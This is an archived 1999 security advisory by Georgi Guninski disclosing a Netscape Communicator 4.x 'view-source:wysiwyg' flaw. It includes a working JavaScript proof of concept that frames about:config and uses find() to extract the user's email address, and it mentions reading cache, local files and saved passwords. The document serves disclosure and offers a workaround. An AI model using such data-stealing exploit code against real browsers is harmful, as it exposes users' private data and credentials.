netscape.view.source.javascript.txt

1999-08-17T00:00:00
ID PACKETSTORM:11814
Type packetstorm
Reporter Georgi Guninski
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Tue, 1 Jun 1999 19:08:49 +0300  
From: Georgi Guninski <joro@NAT.BG>  
To: BUGTRAQ@netspace.org  
Subject: Netscape Communicator "view-source:" security vulnerabilities  
  
There is a security vulnerability in Netscape Communicator 4.6 Win95,  
4.07 Linux (probably all 4.x versions) in the way  
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them  
in a "view-source" window.  
The problem is that it allows access to documents included in the parent  
document via  
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading  
the whole parsed document.  
  
Vulnerabilites:  
  
Browsing local directories  
Reading user's cache  
Reading parsed HTML files  
Reading Netscape's configuration ("about:config") including user's  
email address, mail servers and password.  
Probably others  
  
This vulnerability may be exploited by using HTML email message.  
  
Workaround: Disable JavaScript  
Netscape is notified about the problem.  
  
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
[ Part 2: "Attached Text" ]  
  
[ The following text is in the "koi8-r" character set. ]  
[ Your display is set for the "US-ASCII" character set. ]  
[ Some characters may be displayed incorrectly. ]  
  
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it  
works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it  
allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That  
allows reading the whole parsed document.  
Vulnerabilites:  
  
_________________________________________________________________________________________________________________________________  
  
Browsing local directories  
Reading user's cache  
Reading parsed HTML files  
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.  
Probably others  
  
This vulnerability may be exploited by using HTML email message.  
  
_________________________________________________________________________________________________________________________________  
  
Workaround: Disable JavaScript  
  
_________________________________________________________________________________________________________________________________  
  
This demonstration tries to find your email address, it may take some time.  
  
Written by Georgi Guninski  
  
_________________________________________________________________________________________________________________________________  
  
s="view-source:wysiwyg://1/javascript:s='vvvv&gt&&gt"" +"" +" blur();msg1=\"Your email is: \";  
mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"  
" +"for(i=0;i'"; //a=window.open(s); location=s;  
  
  
-----------------------------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/viewsource.html>  
  
<HTML>  
<BODY>  
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way   
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.  
The problem is that it allows access to documents included in the parent document via   
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.  
<BR>  
Vulnerabilites:  
<HR>  
Browsing local directories<BR>  
Reading user's cache<BR>  
Reading parsed HTML files<BR>  
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>  
Probably others<BR>  
<BR>  
This vulnerability may be exploited by using HTML email message.  
<HR>  
Workaround: Disable JavaScript  
<HR>  
This demonstration tries to find your email address, it may take some time.  
<BR><BR>  
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>  
<HR>  
<SCRIPT>  
  
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt>"  
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"  
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"  
+"setTimeout(\" "  
+"for(i=0;i<charstoread;i++) {"  
+" t=res;"  
+" find(mend);"  
+" for(c=1;c<256;c++) {"  
+" t=res + String.fromCharCode(c);"  
+" if (find(t,true,true)) {"  
+" res=t;"  
+" if (c==32) i=charstoread+1"  
+" } "  
+" }"  
+"}"  
+"res=res.substring(mag.length);"  
+"alert(msg1 + res);"  
+" ;\",3000);</"+"SCRIPT>'";  
//a=window.open(s);  
location=s;  
  
  
</SCRIPT>  
  
`